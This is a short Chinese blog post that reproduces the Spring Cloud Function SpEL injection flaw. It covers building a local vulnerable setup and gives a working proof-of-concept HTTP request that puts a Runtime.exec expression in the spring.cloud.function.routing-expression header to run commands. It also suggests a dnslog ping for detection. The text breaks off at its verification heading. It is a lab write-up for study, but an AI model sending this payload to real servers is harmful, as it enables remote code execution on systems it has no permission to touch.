Spring-Cloud-Function-Spel 漏洞复现
Spring-Cloud-Function-Spel 漏洞复现
1、漏洞环境搭建
由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。
找了许久,终于在唐大佬的github中找到几乎一键的方法。
参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel 这里放原始链接以表示尊重。
无法上github的话,私信我。
搭建方法很简单,先安装maven jdk 等。大佬是jdk17 我本地下载最新版本18 也是ok
方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run 会下载很多库,需要耐心等待。成功后会开启8080 端口。
漏洞poc极其简单:
路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。
POST /functionRouter HTTP/1.1 Host: 192.168.1.7:8080 spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe") Content-Type: application/x-www-form-urlencoded Content-Length: 0
可以执行任意命令,检测的话可以使用dnslog方法。直接ping dnslog平台。
漏洞验证: